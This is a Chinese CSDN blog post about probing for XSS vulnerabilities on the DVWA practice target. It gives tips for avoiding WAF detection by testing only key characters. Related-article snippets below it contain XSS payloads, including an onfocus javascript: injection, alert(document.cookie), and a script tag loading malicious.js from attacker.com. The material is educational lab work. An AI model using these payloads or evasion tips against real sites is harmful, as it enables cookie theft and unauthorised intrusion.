【xss】隐蔽挖掘 xss 漏洞

最新推荐文章于 2024-06-16 22:45:48 发布
最新推荐文章于 2024-06-16 22:45:48 发布
阅读量621 收藏
点赞数
分类专栏: xss跨站脚本 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134520030
版权

漏洞原理:

        服务器对用户提交的数据过滤不严,导致浏览器把用户的输入当成了JS代码并直接返回给客户端执行

漏洞防御:

  • 输入过滤(白名单和黑名单)
  • 输入验证
  • 数据消毒
  • 输出编码

漏洞验证:

环境Windows
靶场dvwa

如果我们在搜索框输入的内容原样返回,没有被过滤或者实体编码,则存在xss漏洞

但是这种测试太明显,容易被waf 等防御措施发现 XSS 攻击的特征,从而封掉 ip 等。

我们可以测试代码是否可以原样返回

比如输入a>/        (这里是终极模式)

发现关键字符被 HTML 实体编码,说明此 XSS 漏洞不可利用

总结:就是不要直接输入明显的xss注入手法,可以分开进行测试,输入xss漏洞的关键部分。

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞挖掘安全防护.pdf
08-08
XSS相关漏洞一直是无法忽略的问题,即使再好的开发工程师也避免不了写出”不安全”的代码,这次议题将深入浅出的介绍一下XSS漏洞形成与危害。
隐蔽挖掘 xss 漏洞
weixin_51559599的博客
11-20 468
XSS 通过构造的代码(JavaScript)注入到网页中,并由浏览器解释运行这段JS 代码,以达到恶意攻击的效果。当用户访问被 XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码​:输入的内容服务器是否原样返回(
Flash XSS漏洞挖掘1
08-03
1. Introduction 2. Vulnerability Analysis Requirement 3. Case Study In Real Worl
XSS漏洞挖掘安全防护.pptx
04-06
XSS漏洞挖掘安全防护,
XSS漏洞 DOM型测试 payload代码
02-26
XSS漏洞 DOM型测试 payload代码 这是测试跨脚本攻击是否有DOM型XSS漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
XSS漏洞挖掘及利用教程
07-31
XSS漏洞挖掘及利用教程,还有大量QQ邮箱的XSS和各种XSS漏洞实战解析哦!
xss+csrf项目实例
最新发布
qq_64302290的博客
06-16 279
如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w提取码:4444。
Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection
weixin_42451330的博客
06-12 456
本文对Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection 进行了介绍,列举了常用指令及示例。
xss-lab的level11-level14
qq_64775230的博客
06-16 14
" onfocus=javascript:alert() type="text把这个填在referer里即可。但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点。所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer。但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss。查看了一下源代码,发现接收的是用户的cookie。而且大于号是被删掉了,但是可以使用伪协议。但是要注意的是大于号是被删除了。value里的是UA头。
XSS(跨站脚本攻击)
guowu666的博客
06-10 1407
xss基础
xss-lab靶场level1-level10
qq_64775230的博客
06-16 128
标签一起使用,以上面图片的html标签为例,标签是有输入框的,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码。">友情链接';echo '友情链接
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1417
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 441
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 951
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 1078
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
NTFS安全权限
2302_80097039的博客
06-12 681
NTFS权限是基于。
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 1116
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
安全等保评测-什么是“等保“?
2401_84434570的博客
06-11 646
它旨在通过对信息和信息系统的安全性进行评估,发现并纠正存在的安全漏洞和隐患,提高信息系统的安全性和可靠性,保障信息的安全。等级保护测评是经公安部认证的具有资质的测评机构,依据国家信息安全等级保护规范规定,受有关单位委托,按照有关管理规范和技术标准,对信息系统安全等级保护状况进行检测评估的活动。进行现场调研和检测:对系统和数据进行现场调研和检测,了解系统和数据的安全状况和存在的问题。确定测评目标和范围:明确要测评的信息和信息系统的范围和目标,了解业务需求和安全需求。
惠州惠城:可燃气体报警器定期校准检测,安全更放心
BDjiance的博客
06-12 619
在惠州惠城这片繁华的土地上,工业发展日新月异,安全问题愈发受到重视。其中,可燃气体报警器作为预防火灾和爆炸事故的重要设备,正在越来越多的场所得到应用。今天,佰德就来探讨一下可燃气体报警器在惠州惠城的重要性以及如何进行定期校准和检测。
xss漏洞挖掘思路包括
05-24
以下是一些常见的 XSS 漏洞挖掘思路: 1. 输入点测试:检查应用程序中任何通过用户输入向服务器发送数据的位置,例如表单、搜索框、评论框等。 2. 输出点测试:检查应用程序中任何将数据呈现给用户的位置,例如页面标题、错误消息、搜索结果等。 3. 触发点测试:检查应用程序中任何会触发 JavaScript 代码执行的位置,例如 onclick、onload、onsubmit 等事件处理程序。 4. 绕过过滤器测试:检查应用程序中任何对用户输入进行过滤或转义的地方,例如 HTML、JavaScript 等。 5. Cookie 测试:检查应用程序中任何使用 cookie 的地方,例如登录、会话管理等。 6. HTTP 头测试:检查应用程序中任何使用 HTTP 头的地方,例如 User-Agent、Referer、Host 等。 7. DOM 测试:检查应用程序中任何使用动态创建 DOM 元素的地方,例如 document.createElement()、innerHTML 等。 8. 嵌入式对象测试:检查应用程序中任何使用嵌入式对象的地方,例如 Flash、Java applet、PDF 等。 9. 漏洞利用测试:尝试利用已知的 XSS 漏洞,以及常见的 XSS 攻击向量,例如 alert(document.cookie)、<script src="http://attacker.com/malicious.js"></script> 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值